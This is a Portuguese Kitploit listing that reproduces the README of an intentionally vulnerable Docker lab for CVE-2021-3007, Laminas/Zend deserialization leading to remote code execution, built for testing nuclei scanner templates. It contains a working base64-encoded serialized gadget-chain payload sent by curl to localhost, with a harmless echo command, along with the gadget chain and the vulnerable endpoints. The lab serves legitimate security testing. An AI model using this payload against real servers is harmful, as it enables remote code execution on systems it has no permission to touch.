Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2021-3007-vulnerable — Ambiente de teste vulnerável CVE-2021-3007 - Desserialização RCE no Laminas/Zend Framework | Kitploit
Ferramentas/GitHubGitHub/kre80r/cve-2021-3007-vulnerable
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubkre80r/cve-2021-3007-vulnerable

cve-2021-3007-vulnerable

Ambiente de teste vulnerável CVE-2021-3007 - Desserialização RCE no Laminas/Zend Framework

Ver Repositório
2há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-3007 Ambiente de Teste Vulnerável

Docker CVE CVSS

Ambiente de teste intencionalmente vulnerável para validar a detecção de CVE-2021-3007 em scanners de segurança.

Visão Geral da Vulnerabilidade

AtributoValor
ID CVECVE-2021-3007
GravidadeCrítica (CVSS 9.8)
TipoDesserialização Insegura → RCE
AfetadoLaminas HTTP < 2.14.2, Zend Framework 3.0.0
CWECWE-502 (Desserialização de Dados Não Confiáveis)

Início Rápido

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2021-3007-vulnerable
cd CVE-2021-3007-vulnerable

# Start vulnerable environment
docker-compose up -d

# Verify it's running
curl http://localhost:8080

# Test with nuclei (optional)
nuclei -t CVE-2021-3007.yaml -u http://localhost:8080

# Cleanup
docker-compose down

Comando Único

root@kitploit:~
docker-compose up -d && sleep 3 && curl -s http://localhost:8080 | head -1

Teste de Exploração Manual

root@kitploit:~
# Send serialized payload triggering RCE
curl -X POST http://localhost:8080/ \
  -d "data=TzoyODoiTGFtaW5hc1xIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086Mjg6IkxhbWluYXNcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMzoiTGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQ0OiIATGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoyMToiTGFtaW5hc1xDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjE3OiJmaWxlX2dldF9jb250ZW50cyI7fX19czoxMzoiACoAYXR0cmlidXRlcyI7YToxOntzOjIyOiJlY2hvIG51Y2xlaUNWRTIwMjEzMDA3IjtpOjE7fX19"

# Esperado: Resposta contém "nucleiCVE20213007" confirmando RCE

Detalhes Técnicos

Cadeia de Gadgets

root@kitploit:~
Laminas\Http\Response\Stream::__destruct()
  └─► Laminas\View\Helper\Gravatar::__toString()
        └─► Laminas\View\Renderer\PhpRenderer::plugin()
              └─► Laminas\Config\Config::get()
                    └─► system() / file_get_contents()

Componentes Vulneráveis

PacoteVersãoPropósito
laminas/laminas-http2.14.1Componente HTTP vulnerável
laminas/laminas-view2.12.0Componente da cadeia de gadgets
laminas/laminas-config3.7.0Componente da cadeia de gadgets

Endpoints Vulneráveis

A aplicação aceita dados serializados via POST:

  • Caminho: / ou /index.php
  • Parâmetros: data, payload, serialized
  • Codificação: Base64

Detalhes do Ambiente

ComponenteValor
Imagem Basephp:8.1-apache
Porta8080
Contêinercve-2021-3007-vulnerable

Arquivos

root@kitploit:~
.
├── Dockerfile          # Configuração de construção do contêiner
├── docker-compose.yml  # Orquestração (configuração única)
├── index.php           # Aplicação PHP vulnerável
├── LICENSE             # Licença MIT
└── README.md           # Este arquivo

Aviso de Segurança

AVISO: Este ambiente é intencionalmente vulnerável apenas para fins de teste de segurança.

NÃO FAÇA:

  • Expor a redes públicas
  • Implantar em ambientes de produção
  • Deixar em execução sem supervisão
  • Usar para fins maliciosos

FAÇA:

  • Usar em ambientes de teste isolados
  • Parar contêineres quando não estiverem em uso
  • Usar apenas para pesquisa legítima de segurança

Referências

  • NVD - CVE-2021-3007
  • GitHub Advisory - GHSA-xx8f-qf9f-5fgw
  • Laminas Security Release
  • CheckPoint Research - FreakOut
  • Ambionics Research

Licença

Licença MIT - Apenas para fins de pesquisa de segurança e educação.


Criado para validação de templates nuclei | projectdiscovery/nuclei-templates

Baixar ferramenta